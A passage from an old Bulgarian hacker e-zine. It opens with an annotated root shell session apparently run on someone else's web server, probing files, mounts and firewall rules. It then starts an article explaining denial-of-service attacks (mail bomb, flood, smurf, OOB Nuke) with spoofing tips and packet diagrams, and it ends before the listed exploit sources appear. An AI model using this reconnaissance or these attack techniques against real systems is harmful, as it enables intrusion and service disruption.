webserv:~# w
1:16am up 88 days, 10:36, 2 users, load average: 0.02, 0.05, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty3 1Jun99 55days 0.28s 0.28s bash
adm ttyp0 xxx.xxx.com 1:16am 1.00s 0.38s 0.09s w
<[ Blaaaaaaah 88dena bez reboot..... a root-a idle 55! ]>
(Bel.Iron - na moiata do tuk sum napravil 34 dni bez UPS... Da vidim koga
shte me udari prokletia tok:-)
webserv:~# ls /
System.map boot/ dev/ home/ lost+found/ nohup.out root/ sysbin/ usr/ vmlinuz
bin/ cdrom/ etc/ lib/ mnt/ proc/ sbin/ tmp/ var/ vmlinuz.old
<[ /sysbin? never heard of it ...q da proverim kvo ima tam..... ]>
webserv:~# cd /sysbin
webserv:/sysbin# ls -l
total 9
-rwx------ 1 root root 109 Apr 21 14:25 conn.inet*
-rwx------ 1 root root 110 Oct 24 1995 conn.inet.dialup*
-rwx------ 1 root root 97 Oct 24 1995 conn.inet.leased*
-rwx------ 1 root root 164 Apr 16 12:47 dial*
-rwx------ 1 root root 25 Dec 17 1998 inet*
-rwx------ 1 root root 75 Mar 26 14:35 run_dup*
-rwx------ 1 root root 119 Mar 26 14:41 run_lsl*
-rwxr-xr-x 1 root root 166 Mar 11 16:41 squid_check*
<[ Edin edinstven vidim fajl.....kak lie bil zabraven .... ]>
webserv:/sysbin# cat squid_check
#!/bin/bash
PATH=$PATH:/usr/bin:/bin:/sbin:/usr/sbin
if ! ps -auxww |grep cache|grep squid ; then
/usr/local/squid/bin/RunCache &
fi
killall -HUP named >/dev/null
<[ Prost sitemen script za nqkakvi celi - da proverqva dali proxy server-a
bachka i da go startira, ako go nqma, i da restartva nameserver-a ...koj
znae zashto .......]>
webserv:/sysbin# mount
/dev/hda3 on / type ext2 (rw)
none on /proc type proc (rw)
/dev/hdc1 on /var type ext2 (rw)
//myserv/temp on /mnt type smbfs (0)
<[ STOOOOOOOP! Samba server vruzka ??? ]>
webserv:/sysbin# df
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda3 466424 366134 76199 83% /
/dev/hdc1 200181 44698 145145 24% /var
//myserv/temp 4233088 1917696 2315392 45% /mnt
<[ Che ima i mqsto ..... ]>
webserv:/sysbin# cd /mnt
webserv:/mnt# ls -l
total 16354
-rwxr-xr-x 1 root root 153331 Jul 6 14:43 addressbook-0.7.tar.gz*
-rwxr-xr-x 1 root root 448628 Jul 8 10:17 apt_0.3.11.deb*
drwxr-xr-x 1 root root 512 Jun 25 10:55 catalog/
-rwxr-xr-x 1 root root 547742 Jul 8 03:08 gconv-modules_2.1.1-12.deb*
-rwxr-xr-x 1 root root 304 Feb 4 14:41 home.htm*
-rwxr-xr-x 1 root root 4753 Jul 5 09:44 kernel-doc-2.2.10.html*
-rwxr-xr-x 1 root root 867106 Jul 5 10:04 kernel-doc-2.2.10_2.2.10-1.deb*
-rwxr-xr-x 1 root root 1628462 Jul 5 13:03 kernel-headers-2.2.10_2.2.10-1.deb*
-rwxr-xr-x 1 root root 3722120 Jul 2 11:28 kernel-image-2.2.10_2.2.10-1.deb*
-rwxr-xr-x 1 root root 492036 Jul 7 16:14 kirc-0_9_5-04_tar*
-rwxr-xr-x 1 root root 132262 Jul 8 02:53 ldso_1.9.11-2.deb*
-rwxr-xr-x 1 root root 1544850 Jul 7 19:43 libc6_2.1.1-12.deb*
-rwxr-xr-x 1 root root 40224 Jul 8 11:23 libesd0_0.2.10-0.19990424.6.2.deb*
-rwxr-xr-x 1 root root 61728 Jul 8 12:07 libglib1.2_1.2.3-1.deb*
-rwxr-xr-x 1 root root 610620 Jul 8 11:53 libgtk1.2_1.2.3-1.deb*
-rwxr-xr-x 1 root root 222578 Jul 8 11:59 libmikmod1_3.1.6-2.deb*
-rwxr-xr-x 1 root root 136622 Jul 7 18:18 libncurses4_4.2-3.2.deb*
-rwxr-xr-x 1 root root 110024 Jul 8 10:22 libstdc++2.9-glibc2.1_2.91.66-2.deb*
-rwxr-xr-x 1 root root 1576972 Jul 8 05:04 libwine0.0.971116_0.0.990704-1.deb*
-rwxr-xr-x 1 root root 707948 Jul 8 13:04 locales_2.1.1-12.deb*
-rwxr-xr-x 1 root root 393406 Jul 8 03:25 mesag3_3.0-1.deb*
-rwxr-xr-x 1 root root 3990 Feb 4 15:16 nav(1).htm*
-rwxr-xr-x 1 root root 80409 Jul 6 14:57 tkMOO-light-0.3.20-dev-05.tar.gz*
-rwxr-xr-x 1 root root 631472 Jul 6 15:21 tm0-3-19s.zip*
-rwxr-xr-x 1 root root 3732 Feb 4 15:15 usl1.htm*
-rwxr-xr-x 1 root root 2863 Feb 4 14:40 usl3.htm*
-rwxr-xr-x 1 root root 2723 Feb 4 14:40 uslugi(1).htm*
-rwxr-xr-x 1 root root 6138 Feb 4 15:15 uslugi1.htm*
-rwxr-xr-x 1 root root 20125 Jul 9 12:07 vd_tr942.zip*
drwxr-xr-x 1 root root 512 Jun 21 10:12 web/
-rwxr-xr-x 1 root root 442118 Jul 5 16:09 wine_0.0.990613-1.deb*
-rwxr-xr-x 1 root root 442266 Jul 7 17:57 wine_0.0.990704-1.deb*
-rwxr-xr-x 1 root root 245830 Jul 8 02:34 xfree86-common_3.3.3.1-10.deb*
-rwxr-xr-x 1 root root 999182 Jul 8 03:15 xlib6g_3.3.3.1-10.deb*
-rwxr-xr-x 1 root root 391330 Jul 8 11:21 xmms_0.9.1-0.1.deb*
-rwxr-xr-x 1 root root 53430 Jul 8 03:26 xpm4g_3.4k-1.deb*
<[ Takaaaa....fen na debian,kato se sudi po mnogoto deb paketi...poradi
lipsa na mqsto na malkoto linux-che si durzhi neshtata na golemiq SMB server
(kojto izglezda e pod nt ]>
webserv:/sysbin# ipfwadm -Il
IP firewall input rules, default policy: accept
type prot source destination ports
acc all ppp0.users.org anywhere n/a
acc tcp srv.provider.net anywhere proxy -> any
acc all 192.168.15.9 anywhere n/a
acc all 192.168.15.8 anywhere n/a
acc all user205.users.org anywhere n/a
acc all user210.users.org anywhere n/a
acc all maniac.users.org anywhere n/a
acc all myserv.users.org anywhere n/a
acc all evgeny.users.org anywhere n/a
acc tcp localnet-1/16 users.org any -> telnet
acc tcp localnet-1/16 users.org any -> www
acc tcp localnet-1/16 anywhere any -> 6667
acc tcp localnet-1/16 anywhere any -> smtp
acc tcp localnet-1/16 anywhere any -> auth
acc tcp localnet-1/16 anywhere any -> pop3
rej tcp localnet-1.users.org/24 anywhere any -> any
<[ Neshto interesno - firewalls ....... ima user-i koito mogat vsichko, a
ostanalite sa orqzani do nqkolko port-a - www na lokalniq server, smtp,
poshta i telnet (zashto li??? )...Sushto taka izglezhda imat i nqkakuv
dial-up, kojto ima prava do navsqkude ..... ]>
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#07ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Denial of Service Attacks IronCode
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
Naposleduk, pri sporove ot vsiakakuv rod po mrezhata, che dori i samo za
gavrata, v zhivotut ni navleze edno iavlenie, narecheno Denial of Service
attacks (ili za po-prostichko - DoS), izvestno iz prostoliudieto kato
"Nuke"-ove. Tuk shte se opitam da iziasnia shto za zhivotno e tova.
Contents:
1. Sushtnost
2. Atakite
2.1. Indirektni Ataki
2.1.1. Mail Bomb
2.1.2. Flood
2.1.3. Smurf
2.2. Direktni Ataki
2.2.1. OOB Nuke
2.2.2. 1. Teardrop
2.2.2. 2. Newtear
2.2.2. 3. Syndrop
2.2.3. Land
2.2.4. Bonk
2.2.5. Nestea
2.2.6. Kiss of Death
2.2.7. Linux 2.2 DoS attack
3. Source Codes
- winnuke.c
- papasmurf.c
- teardrop.c
- newtear.c
- land.c
- latierra.c
- nestea.c
- nestea2.c
- bonk.c
- kod.c
- kox.c
- l22dos.cpp
1. Sushtnost
------------
I taka, kakvo e DoS ataka? Ami tova e ataka, chrez koiato se prechi na edna
ili niakolko mashini da izpulniavat tova, za koeto sa prednaznacheni. V tazi
statia shte se koncentriram specialno na DoS atakite po Internet.
Ima dva vida DoS ataki - direktni ili indirektni. Direktnite vuzdeistvat
direktno na zhertvata - primerno zabivane na mashinata chrez izpolzvane na
bugove v operacionnata sistema ili predizvikvane na greshka v dadeno
prilozhenie, s koeto spirame dadena usluga (primerno da se predizvika
niakakuv exception v httpd demona, s koeto da se poprechi na web-server da
izpulniava funkciite si).
Indirektnite Denial of Service ataki ne vuzdeistvat direktno na mashinata, a
vliaiat na drugi faktori, s koeto prechat na rabotata i. Primer za tova e
t.nar. "flood" - pretovarvane ("navodniavane") na vunshnite kanali na daden
server/mrezha, koeto prechi na normalnite zaiavki da se izpulniavat navreme
i vodi to timeouts.
Istoriata na DoS atakite e neshto mnogo interesno. Takiva ataki e imalo
vinagi, no naposleduk (sled 1997-ma) zapochnaha da se otkrivat novi i novi s
plasheshta skorost. Iavno sega zapochvat da izlizat naiave zle napisanite
fragmenti ot source-ovete na niakoi operacionni sistemi.
Niakoi DoS ataki sa pisani specialno za niakoia operacionna sistema. Takava
e naprimer atakata "OOB Nuke", izvestna oshte kato WinNuke. Drugi ataki puk
zabivat pochti vsichko. Tova e taka, zashtoto povecheto operacionni sistemi
(glavno UNIX-ite, no tova vazhi i za Windows) izpolzvat direktno mrezhovia
source kod na BSD, pochti bez nikakvi promeni, sledovatelno greshkite (ili
po-skoro nedoglezhdaniata) sushto sa bili razprostraneni.
Niakoi ot DoS atakite izprashtat nevalidni paketi, nadiavaiki se na
nedoglezhdane ili nedomisliane v koda na operacionnata sistema, koiato
atakuvat (takiva sa naprimer Land, Teardrop, etc). Drugi puk, kato OOB Nuke
ili Kiss of Death, izprashtat suvsem normalni danni, s koeto obache
predizvikvat greshka. Interesnoto e, che i OOB Nuke, i Kiss of Death sa
prednaznacheni za Windows ;-) ;-)
No ne samo kodut na operacionnite sistemi sudurzha bugove i nedoglezhdania.
Horata, koito pishat programi za DoS ataki, sushto greshat, a v niakoi
sluchai na chovek napravo mu ide da se grumne, kato im chete glupostite
(kakuvto e sluchaiat sus syndrop.c).
I nakraia iskam da otbelezha, che DoS atakite sa mnogo trudni za
proslediavane. V smisul ne, che e trudno da se filtrirat nevalidnite paketi,
a che e trudno da se prosledi ot kude idvat, tui kato obiknoveno se
izpolzvat paketi, v koito source-addressut e falshificiran (t.nar.
spoof-nati paketi, ot spoof - mamia). Pri niakoi ataki (naprimer Land ili
Smurf) tova e prosto zadulzhitelno, tui kato na tova se bazirat (osven ako
ne iskate da precakate sobstvenia si kompiutar) ;-)
Paketi se spoof-vat nai-lesno ako imate UNIX sistema, zashtoto pri UNIX
programite na sistemnia administrator (tezi s root privilegii) imat pravoto
da otvariat t.nar. "raw sockets", t.e. sami da sustaviat celia IP (ili
kakuvto i da e) paket, zaedno s header-a (izkliuchenie pravi edinstveno IP
checksum-a, koito vinagi se populva ot iadroto).
Pri Windows neshtata stoiat dosta po-razlichno. Tui kato pri nego niama
privilegii, userut si e user, a Microsoft iavno ne sa iskali da pozvoliavat
na klientite si takiva volnosti. Taka che za da se izprashtat spoof-nati
paketi ot Windows, triabva po niakakuv nachin da se zaobikoli Winsock, ili
da se napishe sobstven, ili i az ne znam kak, tui kato niamam opit v
pisaneto na winsock programi.
Edinstvenata programa, koiato sum vizhdal da se spravia uspeshno sus
spoof-vane pod Windows, e Agressor Exploit Generator. Tia izprashta napravo
cial PPP frame na modema, s koeto zaobikalia cialata mrezhova chast na
Windows. Za suzhalenie, kakto se doseshtate, tia vurvi samo na modemna PPP
vruzka. Ako izpolzvate lokalna mrezha ili drug vid vruzka, niama kak da ia
izpolzvate, no kato za domashna upotreba stava ;-)
Dostigna do men sluh, che niakakuv momuk imal ideia da pishe raw sockets,
koito da vurviat i pod 95, i pod NT, izpolzvaiki napulno dokumentirani
funkcii (niakakvi IP socket chains, ili neshto takova, Star Gruhtar se opita
da mi obiasni, no ne znaeshe i toi). Iskreno mu pozhelavam uspeh!
I taka, predimstvata i guvkavostta na UNIX pri rabotata s mrezha obiasniava
zashto DoS atakite se praviat predimno ot UNIX programi. Eto zashto i
prilozhenite kum tazi statia source-ove sa za UNIX.
2. Atakite
----------
Atakite, po nachina, po koito vuzdeistvat vurhu zhertvata, mogat da se
razdeliat na dva tipa - globalni, t.e. takiva, koito prechat na cialata
mashina da si vurshi rabotata, ili lokalni - takiva, koito prechat specialno
na niakoe prilozhenie (primerno ICQ-Nukes i taka natatuk). Tui kato
bezsporno ne mozhem da razgledame vsiako edno prilozhenie pootdelno (vremeto
mi vse pak e ogranicheno), tuk shte se sprem specialno na globalnite ataki.
Eto i niakoi ot po-izvestnite DoS ataki, za da dobiete predstava kak tochno
se otkrivat takiva raboti i kakvo predstavliavat. Staral sum se da zapazia
hronologichnia red, za da mozhe da se vidi kak tochno e protichalo
otkrivaneto im, no tui kato e nevuzmozhno hem da se spazva hronologiata, hem
da sa podredeni tematichno, eto posledovatelnostta, v koiato sa izlizali
razglezhdanite DoS ataki:
+------------------------------------------------------------------+
|OOB Nuke 7-May-1997|
|Smurf 28-Jul-1997|
|Teardrop 3-Nov-1997|
|Land 20-Nov-1997|
|Newtear 8-Jan-1998|
|Syndrop (i bez tova ne struva) - -1998|
|Nestea 16-Apr-1998|
|Bonk 1-May-1998|
|Kiss of Death (znam samo, che beshe chisto novo) - -1999|
|Linux 2.2 DoS 1-Jun-1999|
+------------------------------------------------------------------+
2.1. Indirektni Ataki
---------------------
Kakto spomenah, indirektnite ataki vuzdeistvat na atakuvanata mashina
indirektno. Zapushvane na celia vunshen kanal na servera, zabivaneto na
glavni i rezervni marshrutizatori - kakvoto i takova neshto da izmislite,
shte e indirektna ataka.
Iasno e, che takiva ataki ima mnogo. Tuk vse pak shte spomenem trite
po-osnovni - mail bomb, flood i smurf.
2.1.1. Mail Bomb
----------------
+-------------------------------------------------+
| |
| Downloading Message 1 of 100,000,000... |
| __________________________________ |
| |__________________________________| |
| |
+-------------------------------------------------+
(credits za kartinkata - readme-to na KaBoom!)
Mail bombata e pretovarvaneto na daden server (ili prosto e-mail poshtenska
kutia) s ogromno kolichestvo e-maili. V sluchai, che zhertvata e samo edin
e-mail adres, problemut na choveka shte bude da razlichi vazhnata poshta ot
boklucite. Predstavete si, che niakoia sutrin zavarite 100000 e-maila...
Kofti nomer shte e. Reshenieto obiknoveno e zatrivaneto na celia e-mail box,
tvurde nepriatno.
Otdelno, problemi mozhe da si ima i celia server, primerno ako mu prepulnite
diska s e-maili, ili ako e-mailite pristigat prosto po-burzo, otkolkoto e
propuskvatelnata sposobnost na kanala mu (primerno da idvat po-burzo ot 2
Mbps).
Interesno e dali mail bombata triabva da se klasificira kato direktna ili
indirektna ataka. V povecheto sluchai tia e direktna, zashtoto, v kraina
smetka, atakuvame tochno opredelen potrebitel. Za tova pomagat i shiroko
razprostranenite programi za celta - t.nar. mail bomber-i.
Povecheto mail bomberi se pishat za Windows 95, s ideiata da se izpolzvat ot
masite. Tova obache e podhodiashto samo za atakuvane na opredeleni hora.
Pomislete si s vasheto mizerno modemche kolko danni mozhete da izpratite
(ili da download-nete) za edna vecher. A sega si pomislete kak shte
prepulnite diska na servera s tova, ili kak shte mu zapushite vunshnite
kanali. Izkliucheno.
Zapushvaneto na vunshnite kanali na servera obache opredeleno e indirektna
ataka. Viarno, atakuvame suvsem celenasocheno dadenata mashina, no
problemite ne sa predizvikani ot tova, che idvat tochno e-maili, a ot tova,
che idvat mnogo danni. Osven tova po tozi nachin problemi mozhe da ima
cialata mrezha, ne samo konkretnia server. Spomnete si kakvo stana naskoro s
turnovskite provideri.
Kak se pravi mail bomba tuk niama da opisvam. Materiali po vuprosa ima
dostatuchno. Masovo razprostraneni sa vsiakakvi mail bomberi (za nai-dobrite
ot koito vseki e chuval - Unabomber, KaBoom! i t.n.).
Otdelno, ako iskate neshto po-seriozno, mozhete da pregledate Phreedom 17,
statiata "What the Fuck Happened in Tyrnovo?" na Bad Sector. Osven tova
statia po vuprosa ima i vuv Phreedom 9 - "Creating a Mail Bomb", pisana ot
Star Gruhtar. V nastoiashtia broi sushto bi triabvalo da ima materiali ot
Star Gruhtar otnosno izprashtaneto na goliamo kolichestvo e-mailove (stava
vupros za statiata mu ot Phreedom Con'99, v koiato nai-malkoto triabva da e
zasegnal vuprosa).
2.1.2. Flood
------------
Bukvalniat prevod na tazi duma e "navodnenie". Flood-ut kato DoS ataka si e
i tochno tova - navodniavane na izhodnite (ili pone vhodnite) kanali na
dadena mrezha s ogromno kolichestvo danni.
Tova obiknoveno se pravi ot mashina s uzhasno burza vruzka, kato nai-chesto
sreshtaniat nachin e izprashtaneto na ICMP Echo Request paketi (da si go
kazhem napravo - ping-ove). V UNIX komandata ping dazhe pozvoliava na
superuser-a da izpolzva opciata -f - izprashtane na pingove tolkova burzo,
kolkoto pristigat obratno, ili 100 puti v sekunda - koeto ot dvete e
po-burzo. Preporuchitelno e vse pak da ne se izprashtat pingove, po-golemi
ot niakolko kilobaita, zashtoto podobni se filtrirat.
Druga vuzmozhnost, osven pingovete, sa poluotvorenite TCP connectioni.
Izprashtat se SYN (nachalo na vruzka) paketi, vednaga sledvani ot krai na
vruzka.
Flood, razbira se, mozhe da se pravi s vsiakakvi paketi, no predimstvoto na
ICMP Echo Request i na half-open TCP connections e, che te zadulzhavat
zhertvata da otgovori. T.e. ne samo, che paketite shte idvat dosta burzo,
ami i atakuvanata mashina shte im otgovaria, koeto oshte poveche shte ia
natovarva. Naskoro, dokolkoto si spomniam (Feb '99) neshto takova spoletia i
mrezhata na nashiat liubim (po neobhodimost) telefonen operator - BTK ;-)
Edva li e se nalaga da spomenavam, che e hubavo source adresut da se
spoofva.
2.1.3. Smurf
------------
Smurf-ut e chasten sluchai na opisania po-gore flood. Vsushtnost ideiata mu
e predelno prosta. Razchita se na t.nar. broadcast adresi.
Broadcast e adresut, koito se sledi ot ciala dadena mrezha. Paket, poluchen
na tozi adres, se obrabotva ot vsichki ustroistva na mrezhata (ili pone ot
tezi, koito poddurzhat ili sa konfigurirani s broadcast adres). Obiknoveno
tova e adres, koito zavurshva na 0. Makar che zavurshvashtite na 255 se
vodiat multicast, ima sluchai broadcasti da se nastroivat i taka.
Ako naprimer imame broadcast adres ot roda na 193.15.42.0, paket, izpraten
kum nego, se otnasia do vsichki mashini v mrezhata 193.15.42.0. Ako v
mrezhata ima primerno 50 mashini, koito reagirat na broadcast, izpratim li
ping kum tozi adres, shte poluchim 50 otgovora. T.e. mrezhata deistva kato
umnozhitel na paketi.
Sega si predstavete, che imate goliaaaama mrezha, ot koiato da se
poluchavat, primerno, 1 milion otgovora. Izprashtaneto na paket s razmer 1K
kum neinia broadcast adres oznachava poluchavaneto na milion ednokilobaitovi
paketi - tova e 1 GB trafik.
A sega si predstavete, che zapochnete da pingvate suotvetnata mrezha sus
spoof-nati paketi, ot imeto na izbran neshtastnik. Vie prashtate kilobait
navun, nishto rabota, a neshtastnikut zapochva da poluchava gigabait danni.
E, mozhe bi shte gi sprat dosta burzo (golemite mrezhi obiknoveno imat dosta
kvalificiran personal, neprestanno slediasht za problemi - edno takova
chudovishte ne mozhe da si pozvoli srivove), no tova niama da poprechi da
otkachite daden server ot mrezhata.
A predstavete si kolko debela linia puk triabva da ima dadenata mrezha, za
da ima milion hosta, koito da otgovariat na broadcast. Stotici megabiti,
dori gigabiti. Napulno dostatuchno, za da otrezhete ne server, ami ciala
Bulgaria ot mrezhata.
E, Smurf pravi tochno tova. Izprashta spoofnati ICMP paketi kum broadcast
address. papasmurf.c (izliazul godina sled originalnia smurf.c) mozhe da
izprashta i UDP paketi, a po zhelanie - i dvata vida.
Iz mrezhata mogat da se nameriat i spisuci s golemi broadcastove. Adresi
obache tuk niama da vi davam, zashtoto ne e hubavo mnogo hora da razpolagat
s tiah, sami razbirate.
2.2. Direktni Ataki
-------------------
Direktnite DoS ataki sa po-chesto sreshtani ot indirektnite (vsushtnost
mnogo po-chesto), zashtoto sa gore-dolu predvidimi i nasocheni kum edna
ednichka, specifichna cel. Eto niakoi ot tiah (ponezhe diagramite praviat
teksta truden za chetene, sum se postaral da slozha iasni markeri za nachalo
i krai):
2.2.1. OOB Nuke
---------------
OOB Nuke, izvestna sushto taka i kato WinNuke, e mozhe bi edna ot
nai-starite DoS ataki. Obshto vzeto s neia zapochna epohata na remote Denial
of Service atakite po mrezhata. Suzdadena v nachaloto na 97-ma godina
(7-May-1997) i prednaznachena specialno za Windows 95 mashini, tia beshe
naistina goliam hit sred togavashnite IRC manii kato dosta uspeshno sredstvo
za razpraviane s tezi, koito se osmeliavaha da sa po-nagli ot tiah ;-)
OOB Nuke se bazira na tova, che Windows 95 ima problemi s interpretaciata na
taka narechenite OOB (Out Of Band) danni (ne sum go probval na Win 3.x, ne
znam dali raboti). Out Of Band sa danni, kum koito sochi Urgent Pointer-a v
TCP headera. Te ne sa chast ot dannite v paketa, ami neshto razlichno.
Kogato za dadeno prilozhenie se poluchat takiva danni, v socketa samo se
vdiga edin flag, za da znae to, che takiva danni go ochakvat, no to triabva
samo da si gi poiska ot operacionnata sistema i samo da si reshi kak shte gi
obraboti.
I taka, ako Windows 95 poluchi OOB danni, ne znae kak da gi obraboti i se
poburkva. OOB Nuke po princip se pravi na port 139 (NetBIOS Session Service
port-a). Tozi port e izbran, zashtoto obiknoveno e otvoren pri Windows 95.
Izprashtaneto na OOB Nuke vodi do pechalno izvestnia sin ekran, glasiasht
neshto ot sorta "EXCEPTION ne znam ti kakvo si IN MODULE VNETBIOS.VXD", sled
koeto sistemata triabva da se restartira, za da mozhe pak da ima normalen
connection.
Reshenieto e malko sumnitelno - ne triabva da se zarezhda VNETBIOS.VXD. Tova
mozhe da stane ili s preimenuvaneto na VNETBIOS.VXD, koeto obache porazhda
suobshtenie za greshka pri startiraneto na sistemata, ili puk da se
izkliuchi NetBIOS ot Control Panel-a.
Veche edva li e ostanala mashina, poddatliva na OOB Nuke. A i toi ima edin
sushtestven nedostatuk - neobhodimo e ustanoviavaneto na TCP vruzka, koeto
ne pozvoliava spoof-vane na source adresa.
Eto v kakvo se sustoi OOB Nuke (zabelezhete, che formatut na diagramata e
spored RFC, t.e. bitovete sa nomerirani otliavo nadiasno, sledovatelno
Versia 4 i IHL 5 e bait, koito sudurzha 0x45):
Packet #1 (SYN):
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 3C |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 00 20 | DF | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| 40 | 06 = TCP | (filled by kernel) 3C 9A |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
TCP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port (at test) | Destination Port |
| 04 02 | 00 8B |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
| FE 1D EE D8 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgement Number |
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Offset | (reserved)| Flags | Window |
| A | 0 | SYN | 79 60 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
| 76 3D | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 02 04 0F 2C |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 04 02 08 0A |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 39 5F 32 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 01 03 03 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Received Packet (SYN+ACK):
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 3C |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 00 21 | DF | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| 40 | 06 = TCP | (filled by kernel) 3C 99 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
TCP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
| 00 8B | 04 02 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
| FE 2F 2F 9A |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgement Number |
| FE 1D EE D9 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Offset | (reserved)| Flags | Window |
| A | 0 | SYN+ACK | 79 60 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
| E8 F6 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 02 04 0F 2C |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 04 02 08 0A |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 39 5F 32 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 39 5F 32 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 01 03 03 00 |
